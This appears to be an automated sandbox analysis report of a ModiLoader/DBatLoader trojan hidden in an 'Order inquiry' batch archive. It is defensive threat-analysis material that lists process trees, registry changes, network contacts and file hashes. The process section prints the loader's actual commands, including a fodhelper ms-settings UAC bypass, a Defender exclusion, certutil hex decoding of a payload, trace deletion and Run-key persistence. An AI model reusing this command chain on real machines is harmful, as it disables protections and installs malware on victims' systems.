Malware Analysis Report

2025-06-16 05:49

Sample ID 240326-kbr7laec27
Target Order inquiry.tar.gz
SHA256 54bd1088faa941774b69730d313057adc66c12983564b978e3ca753cdf8a6c0b
Tags modiloader trojan persistence
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 54bd1088faa941774b69730d313057adc66c12983564b978e3ca753cdf8a6c0b

Threat Level: Known bad

The file Order inquiry.tar.gz was found to be: Known bad.

Malicious Activity Summary

modiloader trojan persistence

ModiLoader, DBatLoader

ModiLoader Second Stage

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious behavior: MapViewOfSection

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 08:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 08:25

Reported

2024-03-26 08:27

Platform

win7-20231129-en

Max time kernel

51s

Max time network

16s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Public\Libraries\Lewxa.com

Kills process with taskkill

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\Lewxa.com | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\xkn.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2064 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2912 wrote to memory of 2916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2912 wrote to memory of 2916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2976 wrote to memory of 1704 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2976 wrote to memory of 1704 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2976 wrote to memory of 1704 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3008 wrote to memory of 2540 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 3008 wrote to memory of 2540 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 3008 wrote to memory of 2540 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2592 wrote to memory of 2644 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2592 wrote to memory of 2644 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2592 wrote to memory of 2644 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2644 wrote to memory of 2708 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 2644 wrote to memory of 2708 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 2644 wrote to memory of 2708 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 2708 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2808 wrote to memory of 2476 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2808 wrote to memory of 2476 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2808 wrote to memory of 2476 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2064 wrote to memory of 2616 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2616 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2616 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2616 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2616 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2616 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2064 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2020 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2020 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2020 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2732 wrote to memory of 1968 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2732 wrote to memory of 1968 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2732 wrote to memory of 1968 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 716

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | onedrive.live.com | udp
US | 13.107.137.11:443 | onedrive.live.com | tcp
US | 13.107.137.11:443 | onedrive.live.com | tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

C:\Users\Public\alpha.exe

MD5 715f276b8045bc0e5510b4d60cde68b5
SHA1 e4878dcb8da163ab85c17d567deda1f1772cdf97
SHA256 ab27d8cbf064962aa4016bbbcd21b51c1b90b1c4b1f9c2ee1d6a274c9dff1368
SHA512 676f8484008356a071b467ac0a3f6f627244ec2c09506ebcd2433131ac8d5438195810cdca664d7f39d34abf7de18a549909b38db8b40414706976de1e748b2f

\Users\Public\xkn.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2644-21-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2644-22-0x0000000001BA0000-0x0000000001BA8000-memory.dmp

memory/2644-23-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2644-24-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-30-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2644-31-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-32-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-33-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-34-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\Lewxa.txt

MD5 5e3260366c3c643511ba9d5f0bffefd4
SHA1 ef84ae0ed0a835dda0c8ebab1c166e95e8da1403
SHA256 41d8ce140db1ab125f33ac3e8603d01fd85191b37b41314808cb29e069dd4243
SHA512 46e1a3f630e0710bb182a0d9cc1876d7df725c818342def0ed1a657cc6b79b9c996ae483d09357344234d725a10c4af037e67ece32293b63fcb4bf7c932acfc7

C:\Users\Public\Libraries\Lewxa.com

MD5 aa6d1a831ba292e2670da589b8aea980
SHA1 fe61d016a11a1ea9b85bec7139d44b1acbb6bfcd
SHA256 f5cd840346c9d16181109ba81cd4206e46f87682799b54eaa0f3cb4689a7d05d
SHA512 d0eaa2933b75d9114714ecf6c0f04b1bc4396ee570759bc3d7bfca7426f039d0234ffc6791de66332ce5682dfbc5a6daa1fbb252b68e67c65362e42a5a295c08

memory/2944-55-0x0000000003160000-0x0000000004160000-memory.dmp

memory/2944-52-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2944-59-0x0000000003160000-0x0000000004160000-memory.dmp

memory/2944-62-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2944-63-0x0000000000400000-0x0000000000527000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 08:25

Reported

2024-03-26 08:28

Platform

win10-20240221-en

Max time kernel

128s

Max time network

135s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows \System32\1177894.exe | N/A

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Windows\CurrentVersion\Run\Othwubnr = "C:\\Users\\Public\\Othwubnr.url" | C:\Users\Public\Libraries\Lewxa.com | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4324 set thread context of 5100 | N/A | C:\Windows\SysWOW64\SndVol.exe | \??\c:\program files (x86)\internet explorer\iexplore.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\rescache\_merged\2717123927\3950266016.pri | C:\Windows\system32\fodhelper.exe | N/A

Enumerates physical storage devices

Kills process with taskkill

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 668 wrote to memory of 3904 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 668 wrote to memory of 3904 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3904 wrote to memory of 4676 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 3904 wrote to memory of 4676 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 3132 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3132 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3132 wrote to memory of 2540 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 3132 wrote to memory of 2540 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 3672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3672 wrote to memory of 2748 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 3672 wrote to memory of 2748 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 2840 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2840 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2840 wrote to memory of 2852 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2840 wrote to memory of 2852 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2852 wrote to memory of 4272 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 2852 wrote to memory of 4272 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 4272 wrote to memory of 800 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 4272 wrote to memory of 800 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3324 | N/A | C:\Users\Public\xkn.exe | C:\Windows\system32\fodhelper.exe
PID 2852 wrote to memory of 3324 | N/A | C:\Users\Public\xkn.exe | C:\Windows\system32\fodhelper.exe
PID 668 wrote to memory of 4672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4672 wrote to memory of 1620 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4672 wrote to memory of 1620 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 668 wrote to memory of 3664 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3664 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3664 wrote to memory of 4532 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 3664 wrote to memory of 4532 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 668 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 1208 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1208 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2436 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2436 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4484 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4484 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1696 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1696 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1696 wrote to memory of 2500 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 1696 wrote to memory of 2500 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 668 wrote to memory of 4924 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4924 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4924 wrote to memory of 3160 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 4924 wrote to memory of 3160 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 1448 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 1448 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
